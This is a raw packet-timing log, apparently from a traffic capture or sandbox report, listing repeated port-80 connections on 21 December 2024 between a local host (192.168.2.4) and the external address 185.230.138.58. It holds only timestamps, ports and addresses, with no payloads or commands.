                                                                                                                                        Dec 21, 2024 10:09:39.135765076 CET8050061185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:39.139204979 CET5006680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:39.139209986 CET5006180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:39.139317989 CET5006680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:39.150811911 CET5005180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:39.155086994 CET5006780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:39.259023905 CET8050066185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:39.274696112 CET8050067185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:39.275213003 CET5006780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:39.275360107 CET5006780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:39.395011902 CET8050067185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:39.483369112 CET5006680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:39.603039026 CET8050066185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:39.603095055 CET8050066185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:39.626326084 CET5006780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:39.746309996 CET8050067185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:40.387357950 CET8050066185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:40.436316013 CET5006680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:40.520483017 CET8050067185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:40.608202934 CET5006780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:40.620803118 CET8050066185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:40.670689106 CET5006680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:40.756876945 CET8050067185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:40.818785906 CET5006780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:40.876214027 CET5006680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:40.876315117 CET5006780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:40.876472950 CET5007380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:40.996340036 CET8050073185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:40.996409893 CET5007380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:40.996465921 CET8050066185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:40.996520996 CET5006680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:40.996539116 CET8050067185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:40.996599913 CET5007380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:40.996601105 CET5006780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:41.116200924 CET8050073185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:41.342775106 CET5007380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:41.462382078 CET8050073185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:42.252207041 CET8050073185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:42.295691967 CET5007380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:42.484774113 CET8050073185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:42.485112906 CET5007380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:42.605386972 CET8050073185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:42.605433941 CET5007380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:42.612036943 CET5007780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:42.731914043 CET8050077185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:42.731976032 CET5007780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:42.732103109 CET5007780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:42.851588964 CET8050077185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:43.080349922 CET5007780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:43.200052977 CET8050077185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:43.979111910 CET8050077185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:44.128429890 CET5007780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:44.212886095 CET8050077185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:44.340466976 CET5007780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:44.340635061 CET5008180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:44.460314989 CET8050081185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:44.460392952 CET5008180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:44.460604906 CET5008180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:44.461169958 CET8050077185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:44.461218119 CET5007780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:44.582356930 CET8050081185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:44.811449051 CET5008180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:44.931328058 CET8050081185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:45.624838114 CET5008180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:45.624939919 CET5008680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:45.709216118 CET8050081185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:45.709331036 CET5008180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:45.744724989 CET8050086185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:45.744990110 CET8050081185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:45.745079994 CET5008680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:45.745081902 CET5008180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:45.745301008 CET5008680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:45.750401020 CET5008780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:45.865072012 CET8050086185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:45.870290995 CET8050087185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:45.872503996 CET5008780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:45.872637987 CET5008780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:45.992799044 CET8050087185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:46.092755079 CET5008680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:46.212412119 CET8050086185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:46.212470055 CET8050086185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:46.220393896 CET5008780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:46.340112925 CET8050087185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:46.992075920 CET8050086185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:47.118750095 CET8050087185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:47.203408003 CET5008680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:47.217664003 CET5008780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:47.228858948 CET8050086185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:47.311395884 CET5008680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:47.353364944 CET8050087185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:47.405148029 CET5008780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:47.479278088 CET5008680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:47.479397058 CET5008780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:47.480711937 CET5009380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:47.599689960 CET8050086185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:47.600151062 CET8050087185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:47.600660086 CET8050093185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:47.600747108 CET5008680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:47.600753069 CET5008780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:47.600842953 CET5009380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:47.602221966 CET5009380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:47.722011089 CET8050093185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:47.952095032 CET5009380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:48.072417974 CET8050093185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:48.850156069 CET8050093185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:48.998955011 CET5009380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:49.088948011 CET8050093185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:49.212649107 CET5009380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:49.213048935 CET5009780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:49.332973957 CET8050093185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:49.333013058 CET8050097185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:49.333133936 CET5009380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:49.333133936 CET5009780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:49.333390951 CET5009780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:49.453212023 CET8050097185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:49.686533928 CET5009780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:49.806190968 CET8050097185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:50.577585936 CET8050097185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:50.702039003 CET5009780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:50.817471981 CET8050097185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:50.933497906 CET5009780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:50.933928013 CET5010180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:51.143274069 CET8050101185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:51.143311977 CET8050097185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:51.146696091 CET5009780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:51.146716118 CET5010180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:51.146717072 CET5010180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:51.266412973 CET8050101185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:51.502568007 CET5010180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:51.622287035 CET8050101185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:52.234263897 CET5010680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:52.234354019 CET5010180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:52.355570078 CET8050106185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:52.355648041 CET5010680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:52.355792046 CET5010680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:52.361582041 CET5010780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:52.363568068 CET8050101185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:52.363630056 CET5010180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:52.475332022 CET8050106185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:52.481285095 CET8050107185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:52.481367111 CET5010780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:52.481507063 CET5010780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:52.600996971 CET8050107185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:52.702250004 CET5010680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:52.821906090 CET8050106185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:52.821959019 CET8050106185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:52.827301979 CET5010780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:52.947074890 CET8050107185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:53.603060961 CET8050106185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:53.738043070 CET8050107185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:53.811578035 CET5010680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:53.833009005 CET8050106185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:53.905229092 CET5010780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:53.977231026 CET8050107185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:54.014602900 CET5010680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:54.106338024 CET5010680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:54.106491089 CET5010780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:54.106566906 CET5011280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:54.226280928 CET8050112185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:54.226363897 CET5011280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:54.226519108 CET8050106185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:54.226567984 CET5010680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:54.226638079 CET5011280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:54.227480888 CET8050107185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:54.227549076 CET5010780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:54.346149921 CET8050112185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:54.577543974 CET5011280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:54.697247982 CET8050112185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:55.471494913 CET8050112185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:55.608360052 CET5011280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:55.705043077 CET8050112185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:55.707056046 CET5011280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:55.824604988 CET5011780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:55.826967001 CET8050112185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:55.828623056 CET5011280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:55.944469929 CET8050117185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:55.946718931 CET5011780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:55.946949005 CET5011780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:56.066483974 CET8050117185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:56.295944929 CET5011780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:56.415632010 CET8050117185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:57.193470001 CET8050117185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:57.311531067 CET5011780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:57.425106049 CET8050117185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:57.499079943 CET5011780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:57.542491913 CET5011780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:57.542762995 CET5012180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:57.662581921 CET8050117185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:57.662631035 CET8050121185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:57.666974068 CET5012180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:57.666974068 CET5011780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:57.667139053 CET5012180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:57.786828041 CET8050121185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:58.016486883 CET5012180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:58.136311054 CET8050121185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:58.844006062 CET5012680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:58.844290972 CET5012180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:58.914694071 CET8050121185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:58.914757967 CET5012180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:58.963912964 CET8050126185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:58.964027882 CET5012680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:58.964113951 CET8050121185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:58.964138031 CET5012680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:58.964174986 CET5012180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:58.964387894 CET5012780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:59.084125996 CET8050126185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:59.084218979 CET8050127185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:59.084322929 CET5012780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:59.084496975 CET5012780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:59.204361916 CET8050127185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:59.314552069 CET5012680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:59.434664011 CET8050126185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:59.434719086 CET8050126185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:59.438589096 CET5012780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:59.558898926 CET8050127185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:00.207581997 CET8050126185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:00.249017000 CET5012680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:00.327812910 CET8050127185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:00.405263901 CET5012780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:00.444787979 CET8050126185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:00.499087095 CET5012680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:00.561605930 CET8050127185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:00.644790888 CET5012780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:00.688818932 CET5012680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:00.688929081 CET5012780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:00.690516949 CET5012980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:00.808898926 CET8050126185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:00.808979034 CET5012680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:00.809322119 CET8050127185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:00.809379101 CET5012780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:00.809952974 CET8050129185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:00.810035944 CET5012980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:00.810203075 CET5012980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:00.929833889 CET8050129185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:01.156528950 CET5012980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:01.276520014 CET8050129185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:02.057312965 CET8050129185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:02.108421087 CET5012980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:02.297174931 CET8050129185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:02.342811108 CET5012980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:02.573317051 CET5013080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:02.573416948 CET5012980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:02.605998993 CET4995480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:02.693272114 CET8050130185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:02.693342924 CET5013080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:02.693581104 CET5013080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:02.693646908 CET8050129185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:02.693717003 CET5012980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:02.813676119 CET8050130185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:03.045995951 CET5013080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:03.165796995 CET8050130185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:03.949073076 CET8050130185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:03.999181986 CET5013080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:04.181375980 CET8050130185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:04.233426094 CET5013080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:04.313002110 CET5013080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:04.313203096 CET5013180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:04.432876110 CET8050131185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:04.433029890 CET8050130185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:04.433053017 CET5013180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:04.433088064 CET5013080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:04.433207989 CET5013180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:04.552912951 CET8050131185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:04.780858994 CET5013180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:04.900544882 CET8050131185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:05.452940941 CET5013180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:05.453310966 CET5013280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:05.572674036 CET5013380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:05.573002100 CET8050132185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:05.573122978 CET8050131185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:05.573158979 CET5013280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:05.573731899 CET5013280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:05.573801994 CET5013180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:05.693151951 CET8050133185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:05.693258047 CET8050132185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:05.696755886 CET5013380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:05.696755886 CET5013380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:05.816987038 CET8050133185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:05.924612045 CET5013280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:06.044778109 CET8050132185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:06.044817924 CET8050132185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:06.046601057 CET5013380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:06.166619062 CET8050133185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:06.853013039 CET8050132185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:06.905375957 CET5013280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:06.949990988 CET8050133185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:07.014724970 CET5013380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:07.189671040 CET8050133185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:07.307719946 CET5013280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:07.307724953 CET5013380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:07.310601950 CET5013480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:07.429465055 CET8050132185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:07.430003881 CET8050133185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:07.430099964 CET5013380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:07.430131912 CET5013280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:07.431824923 CET8050134185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:07.436717033 CET5013480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:07.436986923 CET5013480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:07.557352066 CET8050134185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:07.796189070 CET5013480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:07.916098118 CET8050134185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:08.687418938 CET8050134185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:08.811638117 CET5013480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:08.921477079 CET8050134185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:09.012671947 CET5013480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:09.047010899 CET5013580192.168.2.4185.230.138.58
